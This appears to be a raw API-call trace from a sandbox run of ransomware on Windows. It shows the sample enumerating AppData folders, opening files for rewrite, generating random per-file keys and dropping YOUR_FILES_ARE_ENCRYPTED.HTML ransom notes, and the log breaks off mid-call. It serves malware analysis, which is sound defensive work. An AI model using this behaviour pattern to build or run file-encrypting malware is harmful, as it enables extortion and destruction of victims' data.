[0123.350] PathFindExtensionW (pszPath="Normal.dotm") returned=".dotm" [0123.350] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0123.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0123.351] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=17985) returned 1 [0123.351] GetProcessHeap () returned 0x600000 [0123.351] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.353] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="0D") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="D9") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="3C") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="83") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="76") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="54") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="B0") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="83") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="9D") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="DE") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="F5") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="66") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="37") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="D4") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="F8") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="C2") returned 2 [0123.353] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="7B") returned 2 [0123.353] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="AD") returned 2 [0123.353] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="14") returned 2 [0123.354] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="98") returned 2 [0123.354] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="CB") returned 2 [0123.354] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="2D") returned 2 [0123.354] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="98") returned 2 [0123.354] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="E2") returned 2 [0123.354] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="49") returned 2 [0123.354] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="24") returned 2 [0123.354] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="41") returned 2 [0123.354] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="37") returned 2 [0123.354] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="BE") returned 2 [0123.354] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="9A") returned 2 [0123.354] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="1D") returned 2 [0123.354] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="53") returned 2 [0123.355] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" [0123.355] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.355] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.355] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4614163, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4614163, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa46a67ce, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4641, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 0 [0123.355] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0123.355] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0123.355] GetProcessHeap () returned 0x600000 [0123.355] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.356] WriteFile (in: hFile=0x308, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.358] CloseHandle (hObject=0x308) returned 1 [0123.358] GetProcessHeap () returned 0x600000 [0123.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.358] GetProcessHeap () returned 0x600000 [0123.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.358] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Vault", cAlternateFileName="")) returned 1 [0123.358] StrStrIW (lpFirst="Vault", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.358] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault") returned 57 [0123.358] GetProcessHeap () returned 0x600000 [0123.358] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.358] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault" [0123.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\*" [0123.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0123.358] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.358] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0123.359] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0123.359] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0123.359] GetProcessHeap () returned 0x600000 [0123.359] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.360] WriteFile (in: hFile=0x308, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.361] CloseHandle (hObject=0x308) returned 1 [0123.361] GetProcessHeap () returned 0x600000 [0123.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.361] GetProcessHeap () returned 0x600000 [0123.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.361] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Windows", cAlternateFileName="")) returned 1 [0123.361] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Word", cAlternateFileName="")) returned 1 [0123.361] StrStrIW (lpFirst="Word", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.361] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word") returned 56 [0123.361] GetProcessHeap () returned 0x600000 [0123.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.362] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word" [0123.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\*" [0123.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0123.362] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.362] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0123.362] StrStrIW (lpFirst="STARTUP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.362] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 64 [0123.362] GetProcessHeap () returned 0x600000 [0123.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.362] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0123.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0123.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f252, dwReserved1=0x60f1e0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f252, dwReserved1=0x60f1e0, cFileName="..", cAlternateFileName="")) returned 1 [0123.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f252, dwReserved1=0x60f1e0, cFileName="..", cAlternateFileName="")) returned 0 [0123.363] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.363] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0123.363] GetProcessHeap () returned 0x600000 [0123.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\word\\startup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.364] WriteFile (in: hFile=0x320, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.365] CloseHandle (hObject=0x320) returned 1 [0123.365] GetProcessHeap () returned 0x600000 [0123.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.365] GetProcessHeap () returned 0x600000 [0123.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.365] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0123.365] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0123.365] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0123.365] GetProcessHeap () returned 0x600000 [0123.365] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\word\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.366] WriteFile (in: hFile=0x308, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.367] CloseHandle (hObject=0x308) returned 1 [0123.367] GetProcessHeap () returned 0x600000 [0123.367] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.367] GetProcessHeap () returned 0x600000 [0123.368] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.369] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e4423, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e4423, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Word", cAlternateFileName="")) returned 0 [0123.369] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0123.369] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0123.369] GetProcessHeap () returned 0x600000 [0123.369] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0123.370] WriteFile (in: hFile=0x32c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0123.371] CloseHandle (hObject=0x32c) returned 1 [0123.371] GetProcessHeap () returned 0x600000 [0123.371] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.371] GetProcessHeap () returned 0x600000 [0123.371] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0123.371] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63237e80, ftCreationTime.dwHighDateTime=0x1d6ff52, ftLastAccessTime.dwLowDateTime=0x2cffd890, ftLastAccessTime.dwHighDateTime=0x1d70866, ftLastWriteTime.dwLowDateTime=0x2cffd890, ftLastWriteTime.dwHighDateTime=0x1d70866, nFileSizeHigh=0x0, nFileSizeLow=0x99a5, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="mwhRadXni-2S9.mp4", cAlternateFileName="MWHRAD~1.MP4")) returned 1 [0123.371] StrStrIW (lpFirst="mwhRadXni-2S9.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.371] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4") returned 59 [0123.371] PathFindExtensionW (pszPath="mwhRadXni-2S9.mp4") returned=".mp4" [0123.371] lstrlenW (lpString=".mp4") returned 4 [0123.371] PathFindExtensionW (pszPath="mwhRadXni-2S9.mp4") returned=".mp4" [0123.371] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mwhradxni-2s9.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0123.372] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=39333) returned 1 [0123.372] GetProcessHeap () returned 0x600000 [0123.372] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.375] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="70") returned 2 [0123.375] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="30") returned 2 [0123.375] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B5") returned 2 [0123.375] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="8C") returned 2 [0123.375] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="51") returned 2 [0123.375] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="D8") returned 2 [0123.375] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E5") returned 2 [0123.375] wsprintfW (in: 